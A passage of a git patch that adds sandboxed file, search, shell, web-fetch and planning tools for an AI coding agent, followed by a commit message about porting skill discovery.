commands (build, test, lint, typecheck) @@ -61,56 +60,56 @@ IMPORTANT: - Never use interactive commands (vim, nano, top, bash, ssh, etc.) - Always quote file paths that may contain spaces - Use detached: true to start dev servers / long-running processes in the background`, - inputSchema: bashInputSchema, - execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { - const sandbox = await getSandbox(experimental_context, "bash"); - const workingDirectory = sandbox.workingDirectory; - const workingDir = cwd - ? path.isAbsolute(cwd) - ? cwd - : path.resolve(workingDirectory, cwd) - : workingDirectory; + inputSchema: bashInputSchema, + execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => { + const sandbox = await getSandbox(experimental_context, "bash"); + const workingDirectory = sandbox.workingDirectory; + const workingDir = cwd + ? path.isAbsolute(cwd) + ? cwd + : path.resolve(workingDirectory, cwd) + : workingDirectory; - if (detached) { - if (!sandbox.execDetached) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: - "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", - }; - } - try { - const { commandId } = await sandbox.execDetached(command, workingDir); - return { - success: true, - exitCode: null, - stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, - stderr: "", - }; - } catch (error) { - return { - success: false, - exitCode: null, - stdout: "", - stderr: error instanceof Error ? error.message : String(error), - }; - } + if (detached) { + if (!sandbox.execDetached) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: + "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.", + }; } + try { + const { commandId } = await sandbox.execDetached(command, workingDir); + return { + success: true, + exitCode: null, + stdout: `Process started in background (command ID: ${commandId}). The server is now running.`, + stderr: "", + }; + } catch (error) { + return { + success: false, + exitCode: null, + stdout: "", + stderr: error instanceof Error ? error.message : String(error), + }; + } + } - const recoupEnv = buildRecoupExecEnv(experimental_context); - const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { - signal: abortSignal, - ...(recoupEnv ? { env: recoupEnv } : {}), - }); + const recoupEnv = buildRecoupExecEnv(experimental_context); + const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); - return { - success: result.success, - exitCode: result.exitCode, - stdout: result.stdout, - stderr: result.stderr, - ...(result.truncated && { truncated: true }), - }; - }, - }); + return { + success: result.success, + exitCode: result.exitCode, + stdout: result.stdout, + stderr: result.stderr, + ...(result.truncated && { truncated: true }), + }; + }, +}); diff --git a/lib/agent/tools/editFileTool.ts b/lib/agent/tools/editFileTool.ts new file mode 100644 index 000000000..d8274c0bc --- /dev/null +++ b/lib/agent/tools/editFileTool.ts @@ -0,0 +1,100 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const editInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to edit (e.g., src/auth.ts)"), + oldString: z.string().describe("The exact text to replace"), + newString: z.string().describe("The text to replace it with (must differ from oldString)"), + replaceAll: z.boolean().optional().describe("Replace all occurrences. Default: false"), + startLine: z + .number() + .optional() + .describe("Line number where oldString starts (for diff display)"), +}); + +/** + * `edit` — exact-string replacement inside a sandboxed file. Requires the + * model to have already read the file so it can produce a unique + * `oldString`. Rejects ambiguous matches unless `replaceAll` is set. + */ +export const editFileTool = tool({ + description: `Perform exact string replacement in a file. + +WHEN TO USE: +- Making small, precise edits to an existing file you have already read +- Renaming a variable or identifier consistently within a single file +- Changing a specific block of code or configuration exactly as seen in the read output + +WHEN NOT TO USE: +- Creating new files (use writeFileTool instead) +- Large structural rewrites where it's simpler to rewrite the entire file (use writeFileTool) + +USAGE: +- Use workspace-relative file paths (e.g., "src/auth.ts") +- You must read the file first with readFileTool in this conversation +- Provide oldString as the EXACT text to replace, including whitespace and indentation +- By default, oldString must be UNIQUE in the file; otherwise the edit will fail +- Use replaceAll: true to change ALL occurrences (e.g., for a rename) +- ALWAYS provide startLine when known: the line number where oldString begins + +IMPORTANT: +- Preserve exact indentation and spacing from the file's content as returned by readFileTool +- Never include line numbers or the "N: " line prefixes from the read output in oldString or newString +- If oldString appears multiple times and replaceAll is false, the tool FAILS with an error and occurrence count`, + inputSchema: editInputSchema, + execute: async ( + { filePath, oldString, newString, replaceAll = false }, + { experimental_context }, + ) => { + const sandbox = await getSandbox(experimental_context, "edit"); + const workingDirectory = sandbox.workingDirectory; + + try { + if (oldString === newString) { + return { success: false, error: "oldString and newString must be different" }; + } + + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const content = await sandbox.readFile(absolutePath, "utf-8"); + + if (!content.includes(oldString)) { + return { + success: false, + error: "oldString not found in file", + hint: "Make sure to match exact whitespace and indentation", + }; + } + + const occurrences = content.split(oldString).length - 1; + if (occurrences > 1 && !replaceAll) { + return { + success: false, + error: `oldString found ${occurrences} times. Use replaceAll=true or provide more context to make it unique.`, + }; + } + + const matchIndex = content.indexOf(oldString); + const startLine = content.slice(0, matchIndex).split("\n").length; + const newContent = replaceAll + ? content.replaceAll(oldString, newString) + : content.replace(oldString, newString); + + await sandbox.writeFile(absolutePath, newContent, "utf-8"); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + replacements: replaceAll ? occurrences : 1, + startLine, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to edit file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/globTool.ts b/lib/agent/tools/globTool.ts new file mode 100644 index 000000000..d1de234d2 --- /dev/null +++ b/lib/agent/tools/globTool.ts @@ -0,0 +1,165 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface FileInfo { + path: string; + size: number; + modifiedAt: number; +} + +const globInputSchema = z.object({ + pattern: z.string().describe("Glob pattern to match (e.g., '**/*.ts')"), + path: z + .string() + .optional() + .describe("Workspace-relative base directory to search from (e.g., src)"), + limit: z.number().optional().describe("Maximum number of results. Default: 100"), +}); + +const GLOB_TIMEOUT_MS = 30_000; +const DEFAULT_LIMIT = 100; + +/** + * `glob` — find files matching a glob pattern, sorted by mtime (newest + * first). Skips hidden files and `node_modules`. Uses `find -printf` on + * GNU find (Linux sandboxes), falling back to `xargs stat` on BSD find. + */ +export const globTool = tool({ + description: `Find files matching a glob pattern. + +WHEN TO USE: +- Locating files by extension or naming pattern (e.g., all *.test.ts files) +- Discovering where components, migrations, or configs live +- Getting a quick list of recently modified files of a given type + +WHEN NOT TO USE: +- Searching inside file contents (use grepTool instead) +- Reading file contents (use readFileTool instead) + +USAGE: +- Supports patterns like "**/*.ts", "src/**/*.js", "*.json" +- Returns FILES (not directories) sorted by modification time (newest first) +- Skips hidden files (names starting with ".") and node_modules +- If path is omitted, the current working directory is used as the base +- Use workspace-relative paths when setting path +- Results are limited by the limit parameter (default: 100) + +IMPORTANT: +- Patterns are matched primarily on the final path segment (file name), with basic "*" and "**" support +- Use this to narrow down candidate files before calling readFileTool or grepTool`, + inputSchema: globInputSchema, + execute: async ( + { pattern, path: basePath, limit = DEFAULT_LIMIT }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "glob"); + const workingDirectory = sandbox.workingDirectory; + + try { + let searchDir: string; + if (basePath) { + searchDir = path.isAbsolute(basePath) ? basePath : path.resolve(workingDirectory, basePath); + } else { + searchDir = workingDirectory; + } + + // Extract file-name pattern (last segment) + literal directory prefix + // (segments before any wildcards) so we can constrain `find -maxdepth`. + const patternParts = pattern.split("/").filter(Boolean); + const namePattern = patternParts[patternParts.length - 1] ?? "*"; + const literalPrefix: string[] = []; + for (let i = 0; i < patternParts.length - 1; i++) { + const part = patternParts[i]!; + if (part.includes("*") || part.includes("?") || part.includes("[")) break; + literalPrefix.push(part); + } + if (literalPrefix.length > 0) { + searchDir = path.join(searchDir, ...literalPrefix); + } + + const remainingDirSegments = patternParts.slice( + literalPrefix.length, + patternParts.length - 1, + ); + const hasRecursiveWildcard = + remainingDirSegments.some(s => s === "**") || namePattern === "**"; + + let maxDepth: number | undefined; + if (!hasRecursiveWildcard) { + maxDepth = remainingDirSegments.length + 1; + } + + const findArgs: string[] = ["find", shellEscape(searchDir)]; + if (maxDepth !== undefined) findArgs.push("-maxdepth", String(maxDepth)); + findArgs.push( + "-not", + "-path", + "'*/.*'", + "-not", + "-path", + "'*/node_modules/*'", + "-type", + "f", + "-name", + shellEscape(namePattern), + ); + + // GNU `find -printf` (Linux) vs BSD `find` (macOS) compatibility. + const findBase = findArgs.join(" "); + const command = [ + `{ ${findBase} -printf '%T@\\t%s\\t%p\\n' 2>/dev/null`, + `|| ${findBase} -print0 | xargs -0 stat -f '%m%t%z%t%N' ; }`, + `| sort -t$'\\t' -k1 -rn | head -n ${limit}`, + ].join(" "); + + const result = await sandbox.exec(command, workingDirectory, GLOB_TIMEOUT_MS, { + signal: abortSignal, + }); + + // find may exit 1 on permission errors but still produce valid output. + if (!result.success && result.exitCode !== 1) { + return { + success: false, + error: `Glob failed (exit ${result.exitCode}): ${result.stdout.slice(0, 500)}`, + }; + } + + const files: FileInfo[] = []; + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + const firstTab = line.indexOf("\t"); + if (firstTab === -1) continue; + const secondTab = line.indexOf("\t", firstTab + 1); + if (secondTab === -1) continue; + const mtimeSeconds = parseFloat(line.slice(0, firstTab)); + const size = parseInt(line.slice(firstTab + 1, secondTab), 10); + const filePath = line.slice(secondTab + 1); + if (isNaN(mtimeSeconds) || isNaN(size) || !filePath) continue; + files.push({ + path: toDisplayPath(filePath, workingDirectory), + size, + modifiedAt: mtimeSeconds * 1000, + }); + } + + return { + success: true, + pattern, + baseDir: toDisplayPath(searchDir, workingDirectory), + count: files.length, + files: files.map(f => ({ + path: f.path, + size: f.size, + modifiedAt: new Date(f.modifiedAt).toISOString(), + })), + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Glob failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/grepTool.ts b/lib/agent/tools/grepTool.ts new file mode 100644 index 000000000..f172f61af --- /dev/null +++ b/lib/agent/tools/grepTool.ts @@ -0,0 +1,143 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +interface GrepMatch { + file: string; + line: number; + content: string; +} + +const grepInputSchema = z.object({ + pattern: z.string().describe("Regex pattern to search for"), + path: z.string().describe("Workspace-relative file or directory to search in (e.g., src)"), + glob: z.string().optional().describe("Glob pattern to filter files (e.g., '*.ts')"), + caseSensitive: z.boolean().optional().describe("Case-sensitive search. Default: true"), +}); + +const GREP_TIMEOUT_MS = 30_000; +const MAX_TOTAL_MATCHES = 100; +const MAX_PER_FILE_MATCHES = 10; +const MAX_LINE_LENGTH = 200; + +/** + * `grep` — search for POSIX-ERE patterns across files in the sandbox via + * `grep -rn`. Caps results to 100 total / 10 per file / 200 chars per + * match line so long stdouts don't blow the model context. + */ +export const grepTool = tool({ + description: `Search for patterns in files using POSIX Extended Regular Expressions (ERE). + +WHEN TO USE: +- Finding where a function, variable, or string literal is used +- Locating configuration keys, routes, or error messages across files +- Narrowing down which files to read or edit + +WHEN NOT TO USE: +- Simple filename-only searches (use globTool instead) +- Directory listings, builds, or other shell tasks (use bashTool instead) + +USAGE: +- Uses POSIX ERE syntax (e.g., "log.*Error", "function[[:space:]]+[a-zA-Z_]+") +- Perl-style shorthands like \\s, \\w, \\d are NOT supported; use POSIX classes instead: [[:space:]], [[:alnum:]_], [[:digit:]] +- Search a specific file OR an entire directory via the path parameter +- Use workspace-relative paths for path (e.g., "src") +- Optionally filter files with glob (e.g., "*.ts", "*.test.js") +- Matches are SINGLE-LINE: patterns do not span across newline characters +- Results are limited to 100 matches total, with up to 10 matches per file; each match line is truncated to 200 characters + +IMPORTANT: +- ALWAYS use this tool for code/content searches instead of running grep/rg via bashTool +- Use caseSensitive: false for case-insensitive searches +- Hidden files and node_modules are skipped when searching directories`, + inputSchema: grepInputSchema, + execute: async ( + { pattern, path: searchPath, glob, caseSensitive = true }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "grep"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(searchPath) + ? searchPath + : path.resolve(workingDirectory, searchPath); + + const args: string[] = ["grep", "-rn"]; + if (!caseSensitive) args.push("-i"); + args.push( + `--exclude-dir=${shellEscape(".*")}`, + `--exclude-dir=${shellEscape("node_modules")}`, + ); + if (glob) args.push(`--include=${shellEscape(glob)}`); + args.push( + "-m", + String(MAX_PER_FILE_MATCHES), + "-E", + shellEscape(pattern), + shellEscape(absolutePath), + ); + const command = args.join(" "); + + const result = await sandbox.exec(command, workingDirectory, GREP_TIMEOUT_MS, { + signal: abortSignal, + }); + + // grep exits with 1 when no matches found — that's not an error. + if (!result.success && result.exitCode !== 1) { + const errorOutput = (result.stderr || result.stdout).slice(0, 500); + return { + success: false, + error: `Grep failed (exit ${result.exitCode}): ${errorOutput}`, + }; + } + + const matches: GrepMatch[] = []; + const filesSet = new Set(); + const fileMatchCounts = new Map(); + + const lines = result.stdout.split("\n").filter(Boolean); + for (const line of lines) { + if (matches.length >= MAX_TOTAL_MATCHES) break; + + // grep -rn output: file:line:content. Find the `:digits:` separator. + const match = line.match(/:(\d+):/); + if (!match || match.index === undefined) continue; + const file = line.slice(0, match.index); + const rest = line.slice(match.index + 1); + const colonIndex = rest.indexOf(":"); + if (colonIndex === -1) continue; + + const lineNum = parseInt(rest.slice(0, colonIndex), 10); + const content = rest.slice(colonIndex + 1); + if (isNaN(lineNum)) continue; + + const displayFile = toDisplayPath(file, workingDirectory); + filesSet.add(displayFile); + const currentFileCount = fileMatchCounts.get(displayFile) ?? 0; + if (currentFileCount >= MAX_PER_FILE_MATCHES) continue; + + fileMatchCounts.set(displayFile, currentFileCount + 1); + matches.push({ + file: displayFile, + line: lineNum, + content: content.slice(0, MAX_LINE_LENGTH), + }); + } + + return { + success: true, + pattern, + matchCount: matches.length, + filesWithMatches: filesSet.size, + matches, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Grep failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/readFileTool.ts b/lib/agent/tools/readFileTool.ts new file mode 100644 index 000000000..f5a486a64 --- /dev/null +++ b/lib/agent/tools/readFileTool.ts @@ -0,0 +1,70 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const readInputSchema = z.object({ + filePath: z.string().describe("Workspace-relative path to the file to read (e.g., src/index.ts)"), + offset: z.number().optional().describe("Line number to start reading from (1-indexed)"), + limit: z.number().optional().describe("Maximum number of lines to read. Default: 2000"), +}); + +/** + * `read` — read a file from the sandbox. Returns numbered lines in the + * format `N: ` so the model can refer to specific lines when + * later editing. + */ +export const readFileTool = tool({ + description: `Read a file from the filesystem. + +USAGE: +- Use workspace-relative paths (e.g., "src/index.ts") +- Paths are resolved from the workspace root +- By default reads up to 2000 lines starting from line 1 +- Use offset and limit for long files (both are line-based, 1-indexed) +- Results include line numbers starting at 1 in "N: content" format + +IMPORTANT: +- Always read a file at least once before editing it with the edit/write tools +- This tool can only read files, not directories — attempting to read a directory returns an error +- You can call multiple reads in parallel to speculatively load several files`, + inputSchema: readInputSchema, + execute: async ({ filePath, offset = 1, limit = 2000 }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "read"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + + const stats = await sandbox.stat(absolutePath); + if (stats.isDirectory()) { + return { + success: false, + error: "Cannot read a directory. Use glob or ls command instead.", + }; + } + + const content = await sandbox.readFile(absolutePath, "utf-8"); + const lines = content.split("\n"); + const startLine = Math.max(1, offset) - 1; + const endLine = Math.min(lines.length, startLine + limit); + const selectedLines = lines.slice(startLine, endLine); + const numberedLines = selectedLines.map((line, i) => `${startLine + i + 1}: ${line}`); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + totalLines: lines.length, + startLine: startLine + 1, + endLine, + content: numberedLines.join("\n"), + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to read file: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/shellEscape.ts b/lib/agent/tools/shellEscape.ts new file mode 100644 index 000000000..8ba4a71a3 --- /dev/null +++ b/lib/agent/tools/shellEscape.ts @@ -0,0 +1,14 @@ +/** + * Escape a string for safe use as a single-quoted shell argument. + * + * Wraps the string in single quotes and escapes any embedded single + * quotes via the standard `' → '\''` dance (close quote, escape literal + * quote, reopen quote). Everything else stays verbatim inside single + * quotes — shell metacharacters like `$`, `` ` ``, `&`, `*` are NOT + * expanded so the result is safe to pass to `bash -c` or `sh -c`. + * + * @param s - The string to escape. + */ +export function shellEscape(s: string): string { + return "'" + s.replace(/'/g, "'\\''") + "'"; +} diff --git a/lib/agent/tools/toDisplayPath.ts b/lib/agent/tools/toDisplayPath.ts new file mode 100644 index 000000000..827c391af --- /dev/null +++ b/lib/agent/tools/toDisplayPath.ts @@ -0,0 +1,34 @@ +import * as path from "path"; + +function isPathWithinDirectory(filePath: string, directory: string): boolean { + const resolvedPath = path.resolve(filePath); + const resolvedDir = path.resolve(directory); + return resolvedPath.startsWith(resolvedDir + path.sep) || resolvedPath === resolvedDir; +} + +/** + * Convert an absolute (or relative-to-workingDirectory) path into a compact + * model-friendly display path. + * + * Paths inside the working directory are returned relative (e.g. + * `src/index.ts`) to avoid repeating long absolute prefixes in tool output. + * Paths outside the working directory remain absolute for clarity and safety + * (e.g. `/etc/hosts`). All separators are normalized to `/`. + * + * @param filePath - Absolute or workspace-relative file path. + * @param workingDirectory - The sandbox's working directory (always absolute). + */ +export function toDisplayPath(filePath: string, workingDirectory: string): string { + const absolutePath = path.isAbsolute(filePath) + ? path.resolve(filePath) + : path.resolve(workingDirectory, filePath); + + if (!isPathWithinDirectory(absolutePath, workingDirectory)) { + return absolutePath.replace(/\\/g, "/"); + } + + const relativePath = path.relative(workingDirectory, absolutePath); + if (relativePath === "") return "."; + + return relativePath.replace(/\\/g, "/"); +} diff --git a/lib/agent/tools/todoWriteTool.ts b/lib/agent/tools/todoWriteTool.ts new file mode 100644 index 000000000..d91e9147a --- /dev/null +++ b/lib/agent/tools/todoWriteTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; + +export const todoStatusSchema = z.enum(["pending", "in_progress", "completed"]); +export type TodoStatus = z.infer; + +export const todoItemSchema = z.object({ + id: z.string().describe("Unique identifier for the todo item"), + content: z.string().describe("The task description"), + status: todoStatusSchema.describe( + "Current status. Only ONE task should be in_progress at a time.", + ), +}); +export type TodoItem = z.infer; + +/** + * `todo_write` — the agent's planning surface. Stateless on the server side + * (the tool simply echoes the list back to the chat UI so the user sees the + * current plan). The agent uses this to track multi-step work and signal + * intent between turns. + * + * Slot into `buildAgentTools` as `todo_write: todoWriteTool`. + */ +export const todoWriteTool = tool({ + description: `Create and manage a structured task list for the current session. + +WHEN TO USE: +- Complex multi-step tasks requiring 3 or more distinct steps +- When the user provides multiple requirements or a checklist +- After receiving new instructions - immediately capture them as todos +- When starting work on a task - mark that todo as in_progress BEFORE beginning +- After completing a task - mark it as completed immediately + +WHEN NOT TO USE: +- A single, straightforward task that can be done in one step +- Trivial tasks requiring fewer than 3 minor steps +- Purely conversational or informational queries + +TASK STATES: +- "pending": Task not yet started +- "in_progress": Currently being worked on (ONLY ONE todo should be in this state at a time) +- "completed": Task finished successfully + +USAGE: +- This tool REPLACES the entire todo list - always send the full, updated list of todos +- Use it frequently to keep the task list in sync with your actual progress +- Update statuses as you start and finish work, rather than batching updates later + +IMPORTANT: +- Only one todo should be in_progress at a time; avoid parallel in_progress tasks +- Mark todos as completed as soon as they are done - do not wait to batch completions +- Use clear, concise todo content so the list remains readable to the user`, + inputSchema: z.object({ + todos: z + .array(todoItemSchema) + .describe("The complete list of todo items. This replaces existing todos."), + }), + execute: async ({ todos }) => { + return { + success: true, + message: `Updated task list with ${todos.length} items`, + todos, + }; + }, +}); diff --git a/lib/agent/tools/webFetchTool.ts b/lib/agent/tools/webFetchTool.ts new file mode 100644 index 000000000..b395457f9 --- /dev/null +++ b/lib/agent/tools/webFetchTool.ts @@ -0,0 +1,124 @@ +import { tool } from "ai"; +import { z } from "zod"; +import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +const FETCH_TIMEOUT_MS = 30_000; +export const MAX_BODY_LENGTH = 10_000; + +const fetchInputSchema = z.object({ + url: z.string().url().describe("The URL to fetch"), + method: z + .enum(["GET", "POST", "PUT", "PATCH", "DELETE", "HEAD"]) + .optional() + .describe("HTTP method. Default: GET"), + headers: z + .record(z.string(), z.string()) + .optional() + .describe("Optional HTTP headers as key-value pairs"), + body: z.string().optional().describe("Optional request body (for POST/PUT/PATCH)"), +}); + +const fetchOutputSchema = z.union([ + z.object({ + success: z.literal(true), + status: z.number().int().nullable(), + body: z.string(), + truncated: z.boolean(), + }), + z.object({ success: z.literal(false), error: z.string() }), +]); + +/** + * `web_fetch` — make an HTTP request from inside the sandbox via curl. + * Lives in the sandbox (not on the worker) so requests come from the + * sandbox's network egress, can reuse its env, and don't bypass any + * sandbox-level policies. Truncates response bodies to 10KB to protect + * model context. + */ +export const webFetchTool = tool({ + description: `Fetch a URL from the web. + +USAGE: +- Make HTTP requests to external URLs +- Supports GET, POST, PUT, PATCH, DELETE, and HEAD methods +- Returns the response status and body text +- Body is truncated to ${MAX_BODY_LENGTH} characters to avoid overwhelming context`, + inputSchema: fetchInputSchema, + outputSchema: fetchOutputSchema, + execute: async ( + { url, method = "GET", headers, body }, + { experimental_context, abortSignal }, + ) => { + const sandbox = await getSandbox(experimental_context, "web_fetch"); + const workingDirectory = sandbox.workingDirectory; + const recoupEnv = buildRecoupExecEnv(experimental_context); + + const args: string[] = [ + "curl", + "-sS", + "-X", + method, + "--max-time", + String(Math.ceil(FETCH_TIMEOUT_MS / 1000)), + "-o", + `>(head -c ${MAX_BODY_LENGTH} >&3)`, + "-w", + shellEscape("%{http_code}"), + ]; + + if (headers) { + for (const [key, value] of Object.entries(headers)) { + args.push("-H", shellEscape(`${key}: ${value}`)); + } + } + if (method !== "GET" && method !== "HEAD" && body) { + args.push("-d", shellEscape(body)); + } + args.push(shellEscape(url)); + + // Use fd 3 to split curl's response body (truncated by `head -c`) from + // the status code written via `-w`. The body goes to stdout via fd 3 + // → fd 1, then we append the status code on its own newline. + const command = [ + "exec 3>&1", + `status=$(${args.join(" ")})`, + "curlExit=$?", + "exec 3>&-", + "printf '\\n%s' \"$status\"", + "exit $curlExit", + ].join("\n"); + + try { + const result = await sandbox.exec(command, workingDirectory, FETCH_TIMEOUT_MS, { + signal: abortSignal, + ...(recoupEnv ? { env: recoupEnv } : {}), + }); + + // exit 23 = curl wrote partial output (`head -c` cut it off — expected for large responses). + if (result.exitCode !== 0 && result.exitCode !== 23) { + return { + success: false, + error: `Fetch failed: ${result.stderr || result.stdout || "Unknown error"}`, + }; + } + + const output = result.stdout ?? ""; + const lastNewline = output.lastIndexOf("\n"); + const statusText = lastNewline !== -1 ? output.slice(lastNewline + 1).trim() : ""; + const responseBody = lastNewline !== -1 ? output.slice(0, lastNewline) : output; + const status = /^\d+$/.test(statusText) ? parseInt(statusText, 10) : null; + + return { + success: true, + status, + body: responseBody, + truncated: result.exitCode === 23, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Fetch failed: ${message}` }; + } + }, +}); diff --git a/lib/agent/tools/writeFileTool.ts b/lib/agent/tools/writeFileTool.ts new file mode 100644 index 000000000..c8e59e3c3 --- /dev/null +++ b/lib/agent/tools/writeFileTool.ts @@ -0,0 +1,65 @@ +import { tool } from "ai"; +import { z } from "zod"; +import * as path from "path"; +import { getSandbox } from "@/lib/agent/tools/getSandbox"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const writeInputSchema = z.object({ + filePath: z + .string() + .describe("Workspace-relative path to the file to write (e.g., src/user.test.ts)"), + content: z.string().describe("Content to write to the file"), +}); + +/** + * `write` — create or completely overwrite a file in the sandbox. Parent + * directories are created as needed. For small targeted edits prefer + * `editFileTool`. + */ +export const writeFileTool = tool({ + description: `Write content to a file on the filesystem. + +WHEN TO USE: +- Creating a new file that does not yet exist +- Completely replacing the contents of an existing file after you've read it + +WHEN NOT TO USE: +- Small or localized changes to an existing file (prefer editFileTool) +- Reading files (use readFileTool instead) +- Searching (use grepTool or globTool instead) + +USAGE: +- Use workspace-relative paths (e.g., "src/user.test.ts") +- This will OVERWRITE existing files entirely +- Parent directories are created automatically if they do not exist + +IMPORTANT: +- ALWAYS read an existing file with readFileTool before overwriting it +- Prefer editing existing files over creating new ones unless a new file is explicitly needed +- NEVER proactively create documentation files (e.g., *.md) unless the user explicitly requests them +- Do not write files that contain secrets or credentials (API keys, passwords, .env, etc.)`, + inputSchema: writeInputSchema, + execute: async ({ filePath, content }, { experimental_context }) => { + const sandbox = await getSandbox(experimental_context, "write"); + const workingDirectory = sandbox.workingDirectory; + + try { + const absolutePath = path.isAbsolute(filePath) + ? filePath + : path.resolve(workingDirectory, filePath); + const dir = path.dirname(absolutePath); + await sandbox.mkdir(dir, { recursive: true }); + await sandbox.writeFile(absolutePath, content, "utf-8"); + const stats = await sandbox.stat(absolutePath); + + return { + success: true, + path: toDisplayPath(absolutePath, workingDirectory), + bytesWritten: stats.size, + }; + } catch (error) { + const message = error instanceof Error ? error.message : String(error); + return { success: false, error: `Failed to write file: ${message}` }; + } + }, +}); From 5e1a386463c7f25fd733d1711c2a28a0afc1b8a1 Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 14:47:56 -0500 Subject: [PATCH 05/10] feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: ` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 